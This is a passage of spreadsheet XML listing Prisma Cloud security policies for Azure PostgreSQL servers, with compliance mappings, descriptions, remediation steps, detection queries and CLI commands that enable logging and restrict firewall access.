      <c r="R2370" t="inlineStr">
        <is>
          <t>A5.15</t>
        </is>
      </c>
      <c r="S2370" t="inlineStr"/>
      <c r="T2370" t="b">
        <v>0</v>
      </c>
      <c r="U2370" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2370" t="inlineStr">
        <is>
          <t>azure-postgresql-flexible-server</t>
        </is>
      </c>
      <c r="W2370" t="inlineStr">
        <is>
          <t>This policy identifies Azure PostgreSQL database flexible servers that are configured with overly permissive network access. It is highly recommended to create PostgreSQL database flexible server with private access to help secure access to server via VNet Integration or with a Firewall rule, you can restrict it further to only a set of IPv4 addresses or IPv4 address ranges.</t>
        </is>
      </c>
      <c r="X2370" t="inlineStr">
        <is>
          <t>If PostgreSQL database flexible server was intended to accesed by authorized public IPs. Restrict IP addresses to known list and make sure IP range '+ Add 0.0.0.0 - 255.255.255.255' is not in Firewall rules. 
To add or to remove IPs refer below URL:
https://docs.microsoft.com/en-gb/azure/postgresql/flexible-server/how-to-manage-firewall-portal#manage-existing-firewall-rules-through-the-azure-portal
To create new PostgreSQL database flexible server with Private access (VNet Integration), refer below URL:
https://docs.microsoft.com/en-gb/azure/postgresql/flexible-server/quickstart-create-server-portal
Note: Once PostgreSQL database flexible server is created; You can't change the connectivity method after. For example, if you select Public access (allowed IP addresses) when you create the server, you can't change to Private access (VNet Integration) after the server is created. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-26
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-26</t>
        </is>
      </c>
      <c r="Y2370" t="inlineStr"/>
      <c r="Z2370" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-postgresql-flexible-server' AND json.rule = properties.state equal ignore case Ready and properties.network.publicNetworkAccess equal ignore case Enabled and firewallRules[?any(properties.startIpAddress equals 0.0.0.0 and properties.endIpAddress equals 255.255.255.255)] exists
{"category":"General","resourceTypes":["azurerm_postgresql_flexible_server_firewall_rule"]}</t>
        </is>
      </c>
      <c r="AA2370" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2370" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2370" t="inlineStr">
        <is>
          <t>PC-AZR-PG-890-CKV2_AZURE_26</t>
        </is>
      </c>
      <c r="AD2370" t="b">
        <v>1</v>
      </c>
      <c r="AE2370" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2370" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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0" t="inlineStr">
        <is>
          <t>cdb612cb-5629-4e0b-a028-8ce69d01104c</t>
        </is>
      </c>
      <c r="AI2370" t="inlineStr">
        <is>
          <t>840a792d-f8a3-4331-b183-3eea67f519b8</t>
        </is>
      </c>
      <c r="AJ2370" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2370" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2371">
      <c r="A2371" t="inlineStr">
        <is>
          <t>APRA (CPS 234) Information Security</t>
        </is>
      </c>
      <c r="B2371" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2371" s="2" t="inlineStr"/>
      <c r="D2371" t="inlineStr"/>
      <c r="E2371" t="inlineStr"/>
      <c r="F2371" t="inlineStr"/>
      <c r="G2371" t="b">
        <v>0</v>
      </c>
      <c r="H23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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2371" t="inlineStr">
        <is>
          <t>azure-postgresql-server</t>
        </is>
      </c>
      <c r="K2371" t="inlineStr">
        <is>
          <t>Test labels</t>
        </is>
      </c>
      <c r="L2371" t="inlineStr"/>
      <c r="M2371" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2371" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2371" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2371" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2371" t="inlineStr">
        <is>
          <t>Information security capability</t>
        </is>
      </c>
      <c r="R2371" t="inlineStr">
        <is>
          <t>CPS234-16</t>
        </is>
      </c>
      <c r="S2371" t="inlineStr">
        <is>
          <t>seansullivan</t>
        </is>
      </c>
      <c r="T2371" t="b">
        <v>0</v>
      </c>
      <c r="U2371" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2371" t="inlineStr">
        <is>
          <t>azure-postgresql-server</t>
        </is>
      </c>
      <c r="W2371" t="inlineStr">
        <is>
          <t>sdfsdf</t>
        </is>
      </c>
      <c r="X2371" t="inlineStr"/>
      <c r="Y2371" t="inlineStr"/>
      <c r="Z2371" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-postgresql-server' AND json.rule = properties.userVisibleState equal ignore case Ready and sku.tier does not equal ignore case Basic and properties.publicNetworkAccess equal ignore case Enabled</t>
        </is>
      </c>
      <c r="AA2371" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB2371" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2371" t="inlineStr"/>
      <c r="AD2371" t="b">
        <v>0</v>
      </c>
      <c r="AE2371" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2371" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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1" t="inlineStr">
        <is>
          <t>79db4427-6672-4dfe-ae5c-3e2687bede73</t>
        </is>
      </c>
      <c r="AI2371" t="inlineStr">
        <is>
          <t>9eee6a8e-18b2-4927-b5c1-87e8701c9487</t>
        </is>
      </c>
      <c r="AJ2371" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2371" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2372">
      <c r="A2372" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v.4.0.1, CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST CSF, NIST CSF v2.0, HITRUST v.9.4.2 [Deprecated], kashan ACSC Information Security Manual (ISM), ISO 27002:2022, ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, ISO/IEC 27002:2013, kfirdaus AWS Account-CS, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, RBI Baseline Cyber Security and Resilience Requirements, CSA CCM v.4.0.1, ISO/IEC 27017:2015, ISO/IEC 27002:2013, ISO/IEC 27018:2019, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, ISO/IEC 27001:2022, ISO/IEC 27002:2013, ISO/IEC 27001:2022, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, ISO/IEC 27002:2013, PCI DSS v4.0, ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, NIST CSF, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, PCI DSS v3.2.1, ISO/IEC 27002:2013, PCI DSS v4.0, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27017:2015, NIST SP 800-172, CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, Sarbanes Oxley Act (SOX), PCI DSS v4.0, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, NIST CSF, CIS Controls v8.1, ISO/IEC 27002:2013, MLPS 2.0 (Level 2), kfirdaus AWS Account-CS, ISO 27002:2022, HITRUST v.9.4.2 [Deprecated], CSA CCM v.4.0.1, ISO/IEC 27018:2019, Microsoft Cloud Security Benchmark v1, ISO/IEC 27017:2015, kashan ACSC Information Security Manual (ISM), SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Demo_Daryl ACSC Information Security Manual (ISM), NIST CSF, CSA CCM v.4.0.1, CSA CCM v.4.0.1, CSA CCM v.4.0.1, CSA CCM v.4.0.1, NIST CSF, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CIS Controls v7.1, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, SOC 2, ISO/IEC 27002:2013, NIST CSF, CSA CCM v.4.0.1, NIST CSF, NIST CSF, ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, CSA CCM v.4.0.1, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, ISO/IEC 27002:2013, ISO/IEC 27002:2013, Copy of New Zealand Information Security Manual (NZISM v3.4), Copy of CIS Controls v8, ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, DORA, ISO/IEC 27002:2013, NIST CSF, CSA CCM v.4.0.1, NIST SP 800-171 Revision 2, ISO/IEC 27018:2019, CSA CCM v.4.0.1, CRI Profile v2.0</t>
        </is>
      </c>
      <c r="B2372" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2372" s="2" t="inlineStr"/>
      <c r="D2372" t="inlineStr"/>
      <c r="E2372" t="inlineStr"/>
      <c r="F2372" t="inlineStr"/>
      <c r="G2372" t="b">
        <v>1</v>
      </c>
      <c r="H23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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2372" t="inlineStr">
        <is>
          <t>azure-postgresql-server</t>
        </is>
      </c>
      <c r="K2372" t="inlineStr">
        <is>
          <t>Azure PostgreSQL Database Server Firewall rule allow access to all IPV4 address</t>
        </is>
      </c>
      <c r="L2372" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2372" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2372" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2372" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2372" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2372" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2372" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S2372" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2372" t="b">
        <v>0</v>
      </c>
      <c r="U2372" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2372" t="inlineStr">
        <is>
          <t>azure-postgresql-server</t>
        </is>
      </c>
      <c r="W2372" t="inlineStr">
        <is>
          <t>This policy identifies Azure PostgreSQL Database Server which has Firewall rule that allow access to all IPV4 address. Having a firewall rule with start IP being 0.0.0.0 and end IP being 255.255.255.255 would allow access to SQL server from any host on the internet. It is highly recommended not to use this type of firewall rule in any PostgreSQL Database Server.</t>
        </is>
      </c>
      <c r="X2372" t="inlineStr">
        <is>
          <t>1.Login to Azure Portal
2.Click on 'All services' on left Navigation
3.Click on 'Azure Database for PostgreSQL servers' under Databases
4.Click on reported server instance
5.Click on 'Connection security' under Settings
6.Delete the rule which has 'Start IP' as 0.0.0.0 and 'End IP' as 255.255.255.255 under 'Firewall rule name' section
7.Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2372" t="inlineStr"/>
      <c r="Z2372" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-postgresql-server' AND json.rule = properties.publicNetworkAccess equal ignore case Enabled and firewallRules.value[?any(properties.startIpAddress equals 0.0.0.0 and properties.endIpAddress equals 255.255.255.255)] exists</t>
        </is>
      </c>
      <c r="AA2372" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2372" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2372" t="inlineStr">
        <is>
          <t>PC-AZR-PG-630</t>
        </is>
      </c>
      <c r="AD2372" t="b">
        <v>1</v>
      </c>
      <c r="AE2372" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2372" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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2" t="inlineStr">
        <is>
          <t>49a1369e-e585-402e-9c09-b58c8e1db73c</t>
        </is>
      </c>
      <c r="AI2372" t="inlineStr">
        <is>
          <t>b77b8a44-f8e1-4cce-9a0c-90bec4640392</t>
        </is>
      </c>
      <c r="AJ2372" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2372" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2373">
      <c r="A2373" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, Azure Security Benchmark (v3), CSA CCM v.4.0.6, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), CIS v2.0.0 (Azure) Level 1, MTSBv2_Azure, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, kashan ACSC Information Security Manual (ISM), MLPS 2.0 (Level 2), Secure Controls Framework (SCF) - 2024.2, kfirdaus AWS Account-CS, ITSG-33, CIS v1.2.0 (Azure), Azure Security Benchmark (v2), ISO/IEC 27002:2013, Copy of Azure Security Benchmark (v3), CIS Controls v7.1, TX-RAMP Level 2, CSA CCM v.4.0.1, ISO 27002:2022, APRA (CPS 234) Information Security, ISO/IEC 27017:2015, PCI DSS v3.2.1, CSA CCM v.4.0.1, ISO/IEC 27017:2015, Fedramp (Low), ISO/IEC 27001:2022, Copy of CIS v1.2.0 (Azure), kashan ACSC Information Security Manual (ISM), CIS Controls v8, ISO/IEC 27001:2022, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, NIST SP 800-171 Revision 2, CRI Profile v1.2.1, NIST 800-53 Rev 5, NIST SP 800-171 Revision 3, Fedramp (Moderate), HITRUST v.9.4.2 [Deprecated], CIS v1.5.0 (Azure) - Level 1, CIS v1.1 (Azure), CDC NIST 800-53 Rev4, ACSC Information Security Manual (ISM), CSA CCM v4.0.12, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CIS v1.3.0 (Azure), CSA CCM v.4.0.1, kfirdaus AWS Account-CS, CRI Profile v2.0, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, SOC 2, NIST CSF v2.0, NIST CSF, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, FFIEC, ISO/IEC 27002:2013, CIS Controls v8.1, jneytchev-fedramp-low, testazure, CIS v2.1.0 (Azure) Level 1, PCI DSS v4.0, CIS v1.3.1 (Azure), DORA, ACSC Information Security Manual (ISM), Copy of CIS Controls v8, PCI DSS v3.2.1, CIS v1.4.0 (Azure), NIST 800-53 Rev4, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, Copy of ACSC Information Security Manual (ISM)-clone</t>
        </is>
      </c>
      <c r="B2373" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2373" s="2" t="inlineStr"/>
      <c r="D2373" t="inlineStr"/>
      <c r="E2373" t="inlineStr"/>
      <c r="F2373" t="inlineStr"/>
      <c r="G2373" t="b">
        <v>1</v>
      </c>
      <c r="H23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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2373" t="inlineStr">
        <is>
          <t>azure-postgresql-server</t>
        </is>
      </c>
      <c r="K2373" t="inlineStr">
        <is>
          <t>Azure PostgreSQL database server with connection throttling parameter is disabled</t>
        </is>
      </c>
      <c r="L2373" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2373" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2373" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2373" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2373" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2373" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2373" t="inlineStr">
        <is>
          <t>ISM-1537</t>
        </is>
      </c>
      <c r="S2373" t="inlineStr"/>
      <c r="T2373" t="b">
        <v>1</v>
      </c>
      <c r="U2373" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2373" t="inlineStr">
        <is>
          <t>azure-postgresql-server</t>
        </is>
      </c>
      <c r="W2373" t="inlineStr">
        <is>
          <t>This policy identifies PostgreSQL database servers for which server parameter is not set for connection throttling. Enabling connection_throttling helps the PostgreSQL Database to Set the verbosity of logged messages which in turn generates query and error logs with respect to concurrent connections, that could lead to a successful Denial of Service (DoS) attack by exhausting connection resources. A system can also fail or be degraded by an overload of legitimate users. Query and error logs can be used to identify, troubleshoot, and repair configuration errors and sub-optimal performance.</t>
        </is>
      </c>
      <c r="X2373" t="inlineStr">
        <is>
          <t>1. Login to Azure console.
2. Navigate to 'Azure Database for PostgreSQL servers' dashboard
3. Click on the alerted database name
4. Go to 'Server parameters' under 'Settings' block
5. From the list of parameters find 'connection_throttling' and set it to on
6. Click on 'Save' button from top menu to save the change. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-13
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azr-networking-13</t>
        </is>
      </c>
      <c r="Y2373" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.DBforPostgreSQL servers/configuration/*' permission. Successful execution will enable connection_throttling which helps the PostgreSQL database to set the verbosity of logged messages,
which in turn generates query and error logs with respect to concurrent connections",
'impact': 'enables connection_throttling in Azure PostgreSQL database servers',
'cliScriptTemplate': 'az postgres server configuration set --resource-group $resourceGroup --server-name $resourceName --name connection_throttling --value on'</t>
        </is>
      </c>
      <c r="Z2373" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-postgresql-server' AND json.rule = "configurations.value[?(@.name=='connection_throttling')].properties.value equals OFF or configurations.value[?(@.name=='connection_throttling')].properties.value equals off"
{"category":"Networking","resourceTypes":["azurerm_postgresql_configuration"]}</t>
        </is>
      </c>
      <c r="AA2373" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2373" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2373" t="inlineStr">
        <is>
          <t>PC-AZR-PG-428-CKV_AZURE_32</t>
        </is>
      </c>
      <c r="AD2373" t="b">
        <v>1</v>
      </c>
      <c r="AE2373" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2373" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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3" t="inlineStr">
        <is>
          <t>43d57e9b-6080-4608-bbe3-e31611b5d240</t>
        </is>
      </c>
      <c r="AI2373" t="inlineStr">
        <is>
          <t>950cc0a0-9c03-457e-965b-9008af4d73c7</t>
        </is>
      </c>
      <c r="AJ2373" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2373" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2374">
      <c r="A2374" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, Azure Security Benchmark (v3), CSA CCM v.4.0.6, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), CIS v1.4.0 (Azure), APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), Secure Controls Framework (SCF) - 2024.2, ITSG-33, Azure Security Benchmark (v2), ISO/IEC 27002:2013, ITSG-33, CIS Controls v7.1, TX-RAMP Level 2, CSA CCM v.4.0.1, ISO 27002:2022, APRA (CPS 234) Information Security, ISO/IEC 27017:2015, New Zealand Information Security Manual (NZISM v3.4), PCI DSS v3.2.1, CSA CCM v.4.0.1, CIS v1.3.1 (Azure), ISO/IEC 27017:2015, Fedramp (Low), CyberSecurity Law of the People's Republic of China, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, CIS v1.2.0 (Azure), APRA (CPS 234) Information Security, CIS Controls v8, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), PCI DSS v4.0, ISO/IEC 27001:2022, CIS v1.1 (Azure), HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, TX-RAMP Level 1, NIST SP 800-171 Revision 2, CRI Profile v1.2.1, CIS v1.5.0 (Azure) - Level 1, NIST 800-53 Rev 5, TX-RAMP Level 2, NIST SP 800-171 Revision 3, Fedramp (Moderate), HITRUST v.9.4.2 [Deprecated], CIS v1.3.0 (Azure), ACSC Information Security Manual (ISM), CyberSecurity Law of the People's Republic of China, CSA CCM v4.0.12, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, CSA CCM v.4.0.1, CIS Controls v8.1, Insurance Regulatory And Development Authority Of India, CRI Profile v2.0, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, SOC 2, NIST CSF v2.0, APRA (CPS 234) Information Security, HIPAA, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, FFIEC, PCI DSS v4.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, CIS Controls v8.1, CIS v2.0.0 (Azure) Level 1, CIS v2.1.0 (Azure) Level 1, CSA CCM v4.0.12, DORA, ACSC Information Security Manual (ISM), PCI DSS v3.2.1, NIST 800-53 Rev4, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172</t>
        </is>
      </c>
      <c r="B2374" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2374" s="2" t="inlineStr"/>
      <c r="D2374" t="inlineStr"/>
      <c r="E2374" t="inlineStr"/>
      <c r="F2374" t="inlineStr"/>
      <c r="G2374" t="b">
        <v>0</v>
      </c>
      <c r="H23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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2374" t="inlineStr">
        <is>
          <t>azure-postgresql-server</t>
        </is>
      </c>
      <c r="K2374" t="inlineStr">
        <is>
          <t>Azure PostgreSQL database server with log disconnections parameter disabled</t>
        </is>
      </c>
      <c r="L2374" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2374" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2374" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2374" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2374" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2374" t="inlineStr">
        <is>
          <t>3.4</t>
        </is>
      </c>
      <c r="R2374" t="inlineStr">
        <is>
          <t>3.4.2e</t>
        </is>
      </c>
      <c r="S2374" t="inlineStr"/>
      <c r="T2374" t="b">
        <v>1</v>
      </c>
      <c r="U2374" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2374" t="inlineStr">
        <is>
          <t>azure-postgresql-server</t>
        </is>
      </c>
      <c r="W2374" t="inlineStr">
        <is>
          <t>This policy identifies PostgreSQL database servers for which server parameter is not set for log disconnections. Enabling log_disconnections helps PostgreSQL Database to Logs end of a session, including duration, which in turn generates query and error logs. Query and error logs can be used to identify, troubleshoot, and repair configuration errors and sub-optimal performance.</t>
        </is>
      </c>
      <c r="X2374" t="inlineStr">
        <is>
          <t>1. Login to Azure console.
2. Navigate to 'Azure Database for PostgreSQL servers' dashboard
3. Click on the alerted database name
4. Go to 'Server parameters' under 'Settings' block
5. From the list of parameters find 'log_disconnections' and set it to on
6. Click on 'Save' button from top menu to save the change.</t>
        </is>
      </c>
      <c r="Y2374" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.DBforPostgreSQL servers/configuration/*' permission. Successful execution will enable log_disconnections which helps the PostgreSQL database to log end of a sessions,
including duration,
which in turn generates query and error logs.",
'impact': 'enables log_disconnections in Azure PostgreSQL database servers',
'cliScriptTemplate': 'az postgres server configuration set --resource-group $resourceGroup --server-name $resourceName --name log_disconnections --value on'</t>
        </is>
      </c>
      <c r="Z2374" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-postgresql-server' AND json.rule = "configurations.value[?(@.name=='log_disconnections')].properties.value equals OFF or configurations.value[?(@.name=='log_disconnections')].properties.value equals off"</t>
        </is>
      </c>
      <c r="AA2374" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2374" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2374" t="inlineStr">
        <is>
          <t>PC-AZR-PG-430</t>
        </is>
      </c>
      <c r="AD2374" t="b">
        <v>1</v>
      </c>
      <c r="AE2374" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2374" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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4" t="inlineStr">
        <is>
          <t>80c4ade7-44a2-4f01-9997-43c18bc4d7e1</t>
        </is>
      </c>
      <c r="AI2374" t="inlineStr">
        <is>
          <t>12ce02be-0355-48ab-9b83-6757dbc7e7de</t>
        </is>
      </c>
      <c r="AJ2374" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2374" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2375">
      <c r="A2375" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, Azure Security Benchmark (v3), CSA CCM v.4.0.6, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), Secure Controls Framework (SCF) - 2024.2, CIS v1.1 (Azure), CIS v1.3.0 (Azure), ITSG-33, Azure Security Benchmark (v2), ISO/IEC 27002:2013, ITSG-33, CIS Controls v7.1, TX-RAMP Level 2, CSA CCM v.4.0.1, ISO 27002:2022, APRA (CPS 234) Information Security, ISO/IEC 27017:2015, PCI DSS v3.2.1, CSA CCM v.4.0.1, GDPR, ISO/IEC 27017:2015, Fedramp (Low), CyberSecurity Law of the People's Republic of China, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, CIS v2.0.0 (Azure) Level 1, CIS v2.1.0 (Azure) Level 1, CIS Controls v8, PCI DSS v4.0, ISO/IEC 27001:2022, CIS v1.3.1 (Azure), HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, TX-RAMP Level 1, CIS v1.5.0 (Azure) - Level 1, NIST SP 800-171 Revision 2, CRI Profile v1.2.1, NIST 800-53 Rev 5, TX-RAMP Level 2, NIST SP 800-171 Revision 3, Fedramp (Moderate), HITRUST v.9.4.2 [Deprecated], CIS v1.2.0 (Azure), ACSC Information Security Manual (ISM), CyberSecurity Law of the People's Republic of China, CIS v1.4.0 (Azure), CSA CCM v4.0.12, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, CSA CCM v.4.0.1, CIS Controls v8.1, Insurance Regulatory And Development Authority Of India, CRI Profile v2.0, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, SOC 2, NIST CSF v2.0, APRA (CPS 234) Information Security, HIPAA, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, FFIEC, PCI DSS v4.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, CIS Controls v8.1, CSA CCM v4.0.12, DORA, ACSC Information Security Manual (ISM), PCI DSS v3.2.1, NIST 800-53 Rev4, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172</t>
        </is>
      </c>
      <c r="B2375" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2375" s="2" t="inlineStr"/>
      <c r="D2375" t="inlineStr"/>
      <c r="E2375" t="inlineStr"/>
      <c r="F2375" t="inlineStr"/>
      <c r="G2375" t="b">
        <v>1</v>
      </c>
      <c r="H23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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2375" t="inlineStr">
        <is>
          <t>azure-postgresql-server</t>
        </is>
      </c>
      <c r="K2375" t="inlineStr">
        <is>
          <t>Azure PostgreSQL database server with log connections parameter disabled</t>
        </is>
      </c>
